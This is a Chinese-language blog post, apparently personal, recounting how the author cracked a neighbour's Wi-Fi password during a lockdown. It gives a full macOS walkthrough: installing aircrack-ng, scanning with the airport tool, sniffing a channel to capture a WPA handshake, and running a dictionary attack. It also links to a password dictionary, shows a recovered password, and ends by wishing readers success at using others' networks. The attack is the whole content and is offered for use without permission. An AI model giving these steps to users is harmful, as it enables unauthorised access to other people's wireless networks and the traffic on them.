出差第二天，住的小區因為疫情被封，宿舍又沒有wifi，看著附近滿滿的WIFI信號列表，wifi萬能鑰匙卻一個都連接不上，心中一萬匹CNM。。。于是電腦連上手機熱點，然后各種折騰，終于破解了一個隔壁的wifi密碼。

準備工作

1.電腦：MacBook Pro （本機系統版本為 macOS Catalina 10.15.6 ）

2.下載軟件：MacPorts，然后安裝（提醒：安裝時斷網，不然極有可能卡死）

3.更新MacPorts，打開終端，輸入命令（兩次）：

sudo port selfupdate

? 下載安裝MacPorts可參考：http://www.rzrgm.cn/Mateo-dengmin/p/15855168.html

4.更新完成后，安裝aircrack-ng，輸入命令：

sudo port install aircrack-ng

5.Mac系統自帶WIFI工具：airport，運行該工具，該程序的路徑默認為：/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport，可以直接運行也可以在終端輸入命令來運行

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s

SSID 是 wifi名稱，RSSI 是信號強度，CHANNEL 是信道。效果如下：

6.下載wifi密碼字典（多種可供選擇）

鏈接:https://pan.baidu.com/s/1uSHL7PVbLqkZZqAZhb6Epw 密碼: gl1t

7.獲取本機網卡信息，輸入命令：

ifconfig

本機電腦網卡為 en0

破解開始

1.獲取握手包，開始抓包，en0為電腦網卡，13為監聽的信道，命令如下：

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport en0 sniff 13

2.監聽之后，Wi-Fi圖標會變化，使用ctrl+c停止監聽，系統會將監聽到的數據cap文件保存到本地/tmp文件夾下。打開cap文件，查看cap文件中的數據是否被抓取到，輸入命令查看：

sudo aircrack-ng /tmp/airportSniffhKI8Kg.cap

如果要查詢的路由列表的 Encryption中（0 handshake）是抓包失敗，（1 handshake）則是抓包成功，否者要回到第1步重新抓取。（抓包時需要剛好這段時間有人重新連接了wifi才能抓到 WPA(1 handshake)的數據）

3.進入字典所在目錄(進入個人存放wifi密碼字典目錄)

cd  ~/Documents/wifi

4.開始破解，dic.txt 為字典文件，/tmp/airportSniffhKI8Kg.cap為抓取到的握手包，命令如下：

sudo aircrack-ng -w dic.txt /tmp/airportSniffhKI8Kg.cap

效果如下：

提示「Index number of target network ?」時，輸入 Encryption 中為（1 handshake）數據的行號，這里輸入730。

等待破解結果...，中斷破解過程可以直接按 command + c 組合鍵退出。破解過程所需時間長短受電腦硬件配置、字典體積大小的影響。如果dic.txt字典破解失敗，則可以換其它字典進行破解，直到破解成功。

5.如果破解成功則會如下圖所示：

這里破解出來的密碼為：b36tm772

最后，祝大家都能蹭網成功！